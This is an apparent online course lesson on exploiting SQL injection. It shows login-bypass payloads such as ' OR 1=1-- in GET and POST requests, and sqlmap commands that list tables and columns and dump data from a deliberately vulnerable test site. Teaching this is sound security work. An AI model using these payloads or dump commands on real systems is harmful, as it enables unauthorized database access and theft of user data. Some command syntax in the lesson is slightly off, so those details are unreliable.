Exploitation

One of the aims of every cybercriminal is to get access to databases to steal users’ credentials, alter the data, or even sabotage an organization’s ability to function by deleting everything. This is where finding SQL injections becomes important. The data gained from an injection or even the injection vector could be used to perform other attacks or go straight for privilege escalation if possible.

Let’s look at some ways in which SQL injections can be exploited.

The GET method

We first check that the data sent in the request is referenced in the URL. If yes, this means that the data that’s sent is visible in the URL. For example, let’s take a web application that has a login page. We enter the username and password, and when we click the “Login” button, the URL updates as such:

example.com/login.php?username=admin&password=admin

In order to bypass the login and gain unauthorized access, an attacker could perform a simple SQL injection like so:

example.com/login.php?username='OR1=1--&password=admin

Entering the URL above will simply input an empty string for the username field and dismiss the password field altogether, and the OR1=1 part will ask the database server to return true no matter what.

The POST method

This is the case where the data is sent in the body of the request sent by the user. Therefore, as opposed to the GET method, the sent data is not visible in the URL of the website or the webpage. An attacker, therefore, can use the input fields given by the web application. Simply entering ' OR 1=1 should work. Sometimes, we may need something extra to comment out the other field, so an # or -- should suffice.

SQLMap

We’ve already seen SQLMap in action in the previous lesson. Let’s now see how to use it beyond searching for vulnerabilities:

  • sqlmap http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables: This will return all the tables in the acuart database.

  • sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists --columns: This will return the structure of the table being queried. In this case, we want to check how data is structured in the artists table.

  • sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists -C aname --dump: This will return a list of the names of all the artists in the artists table.

Let’s use the terminal below to try out the commands above and check the output:

Get hands-on with 1200+ tech skills courses.